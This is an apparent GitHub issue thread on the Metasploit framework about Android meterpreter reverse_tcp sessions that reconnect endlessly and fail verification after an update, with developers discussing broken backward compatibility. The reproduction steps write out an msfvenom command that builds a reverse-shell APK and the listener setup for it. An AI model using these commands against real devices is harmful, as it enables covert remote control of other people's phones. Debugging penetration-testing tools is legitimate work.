### ISSUE TITLE
android/meterpreter/reverse_tcp infinite connections

### ISSUE THREAD

**Issue by ng1905** [rapid7/metasploit-framework#7458]
## Steps to reproduce

1. msfvenom -p android/meterpreter/reverse_tcp LHOST=[IP] LPORT=4444 -f raw > app.apk
2. use android/meterpreter/reverse_tcp
3. set LHOST [IP]
4. set LPORT [PORT (4444 in my case)]
5. set ExitOnSession false
6. run -j

1st target:
Nexus 5x running Android 7.0 (Nougat)

2nd target:
Samsung Galaxy S4 (GT-I9505) running Android 5.0.1 (Lollipop)

## Expected behavior

The handler should wait for a connection and then load the required plugins (e.g. load Android). This worked all fine till I updated MSF on 2016-10-15.

## Current behavior

The handler is waiting for a connection but fails while loading the extensions. Commands like pwd generate an error and the connection closes due to SessionVerification. The Problem is that I did not change any of the used payloads on my two target devices. While waiting for verification to happen, the target device connects again and again (I'm now on session 403).

framework.log shows following errors:

 

> [10/18/2016 23:26:49] [e(0)] core: Connection not established: ActiveRecord::ConnectionNotEstablished ActiveRecord::ConnectionNotEstablished:
/opt/metasploit-framework/embedded/lib/ruby/gems/2.1.0/gems/activerecord-4.2.7.1/lib/active_record/connection_handling.rb:109:in `connection_pool'
/opt/metasploit-framework/embedded/framework/lib/msf/core/db_manager/connection.rb:123:in `connection_established?'
/opt/metasploit-framework/embedded/framework/lib/msf/core/db_manager/connection.rb:54:in `connect'
/opt/metasploit-framework/embedded/framework/lib/msf/ui/console/driver.rb:174:in `initialize'
/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:62:in `new'
/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:62:in `driver'
/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/console.rb:48:in `start'
/opt/metasploit-framework/embedded/framework/lib/metasploit/framework/command/base.rb:82:in `start'
/opt/metasploit-framework/bin/../embedded/framework/msfconsole:48:in `<main>'
[10/18/2016 23:27:39] [d(0)] core: Session 1 did not respond to validation request Rex::TimeoutError: Operation timed out.

### Metasploit version

4.12.35-dev-260257a144d1fefe754feda8d9c7c6d5e12c9de6

### I installed Metasploit with:
- [ ] Kali package via apt
- [ ] Omnibus installer (nightly)
- [ ] Commercial/Community installer (from http://www.rapid7.com/products/metasploit/download.jsp)
- [ ] Source install (please specify ruby version)
- [*] Too long ago to remember... But updating is done via apt (added to sources.list.d by installation script). Ruby: ruby 2.1.5p273 (2014-11-13) [x86_64-linux-gnu]

### OS

Linux ngsger 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt25-2 (2016-04-08) x86_64 GNU/Linux

**Comment by bcook-r7** [comment]
"The Problem is that I did not change any of the used payloads on my two target devices."

Are you saying you generated the payload with an older version of metasploit, and are testing the payload against the latest framework?

**Comment by timwr** [comment]
I think I broke backwards compatibility with older staged payloads. Let me see if I can fix it.

**Comment by ng1905** [comment]
"Are you saying you generated the payload with an older version of metasploit, and are testing the payload against the latest framework?" 
This is exactly what I was trying to say.

"I think I broke backwards compatibility with older staged payloads. Let me see if I can fix it."
I just saw the commit; how am I able to check the result with this change? Or does it come with the next update?

Thanks for the fast replies!

**Comment by mahmoudissam** [comment]
Yes the same is happening to me, when I upgraded to v4.12.34-dev , all the commands are not working (pwd, ls...etc).

This is happening to the payloads I generated in the old framework version.

So I had to revert back to v4.12.32-dev.

Thanks,
Mahmoud

**Comment by mahmoudissam** [comment]
@timwr , The backwards compatibility is broken again in v4.12.39-dev.
